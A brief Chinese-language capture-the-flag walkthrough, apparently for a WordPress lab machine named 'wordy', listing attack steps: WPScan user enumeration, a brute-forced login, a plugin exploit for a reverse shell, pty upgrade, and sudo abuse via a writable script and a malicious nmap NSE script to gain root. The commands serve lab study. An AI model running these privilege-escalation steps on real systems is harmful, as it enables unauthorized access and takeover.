nmap 扫描服务
修改 hosts 文件
发现是 wordpress wpscan --url http://wordy/ --enumerate u
查看wordpress用户
爆破得密码 mark:helpdesk01
发现 active monitor 插件
搜索 exp ,反弹 shell
发现用户名密码
python -c 'import pty;pty.spawn("/bin/bash")'
转换成 pty
sudo -l
发现 jens 命令
echo /bin/sh > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
nmap的版本在2.02-5.21之间,这样可以直接使用nmap的交互模式提权
echo 'os.execute("/bin/sh")' > /tmp/rootshell.nse
sudo nmap --script=/tmp/rootshell.nse